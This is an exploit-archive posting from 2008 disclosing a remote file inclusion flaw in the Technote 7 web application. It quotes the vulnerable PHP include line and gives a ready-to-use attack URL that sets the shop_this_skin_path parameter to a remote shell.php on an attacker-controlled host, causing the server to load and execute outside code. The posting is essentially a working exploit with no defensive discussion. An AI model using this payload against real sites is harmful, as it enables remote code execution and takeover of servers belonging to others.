[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Technote 7 (shop_this_skin_path) Remote File Inclusion Vulnerability
# Published : 2008-09-17
# Author : webDEViL
# Previous Title : PHP Crawler 0.8 (footer) Remote File Inclusion Vulnerability
# Next Title : X10media Mp3 Search Engine 1.5.5 Remote File Inclusion Vulnerability
#-----------webDEViL - [ w3bd3vil [at] gmail [dot] com ] -----------#
#-----------Technote 7 Remote File Inclusion------------------------#
# ----------developers site: http://www.technote.co.kr--------------#
bash-3.1# cat technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php
...snip...
$TWIN_SET['dir_path']= "$shop_this_skin_path/3_plugin_twindow/skin_gray";
...snip...
include_once "$TWIN_SET[dir_path]/frame_design.php";
http://site/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://ip.a.dd.r/shell.php?
# www.Syue.com [2008-09-17]